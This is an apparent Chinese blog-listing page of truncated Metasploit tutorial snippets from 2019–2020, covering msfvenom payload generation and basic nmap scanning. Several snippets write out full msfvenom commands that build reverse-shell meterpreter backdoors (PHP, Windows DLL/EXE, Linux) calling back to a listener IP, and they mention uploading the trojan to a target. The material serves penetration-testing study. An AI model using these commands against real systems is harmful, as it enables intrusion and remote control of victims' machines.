Metasploit发布了版本5.0.76在该版本中,增加了以下模块:(1)增强了set payload命令的输入。用户在指定payload时,在payload名称前可以使用/payload、payload/和/前缀。(2)post/windows/manage/sshkey_persistence ...
分类:
Web程序 时间:
2020-02-22 15:30:06
阅读次数:
75
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as ...
分类:
Web程序 时间:
2020-02-19 13:05:16
阅读次数:
266
一、运行exe程序反弹shell 需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。 二、加载dll文件反弹shell 需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。 三、P ...
第一步:生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll 第二步:启动MSF等待回连 use exploit/mu ...
分类:
系统相关 时间:
2020-02-16 16:13:17
阅读次数:
132
Metasploit中的payload分类下提供了大量的被控端程序,可以根据测试需求自动生成。 使用msfvenom -l payloads | more查看支持的控制端,如下图: kali 2019总共支持556种类,如上图所示,本例只演示andriod端。 Step1:使用msfvenom命令生 ...
分类:
其他好文 时间:
2020-02-15 15:55:30
阅读次数:
111
2020年一月12日 作者:寒江独钓人 周报 一周所学知识 1. 环境配置(jdk,python共存,虚拟机,markdown) 2. 漏洞复现(使用msfvenom自动生成木马,制作免杀) 3. 信息收集(横向信息收集,纵向信息收集) 4. 计算机网络基础(osi七层模型,计算机网络) 一、环境配 ...
分类:
其他好文 时间:
2020-01-13 01:03:17
阅读次数:
180
扫描对方IP:ifconfig (先获取自己的IP)netdiscover -r 192.168.0.1/24 (扫描1~124的IP)获取IP后:nmap -sV 192.168.0.104 (端口扫描)nmap -A -v -T4 192.168.0.104 (TCP 端口扫描) 端口: 22: ...
分类:
其他好文 时间:
2019-12-18 21:56:17
阅读次数:
212
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/me ...
分类:
其他好文 时间:
2019-11-16 14:14:37
阅读次数:
138
1、查看该模块的可用参数 msfvenom -p windows/shell_reverse_tcp --list-options 2、生成攻击载荷 msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe ...
分类:
其他好文 时间:
2019-10-31 20:07:52
阅读次数:
109
一、PHP后门 在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下: 1. 使用msfvenom 创建一个webshell.php 2. 上传到服务器 3.开始监听 4.访问webshell.php的页面 5. 获得反弹Shell pa ...
分类:
Web程序 时间:
2019-10-10 15:36:22
阅读次数:
130
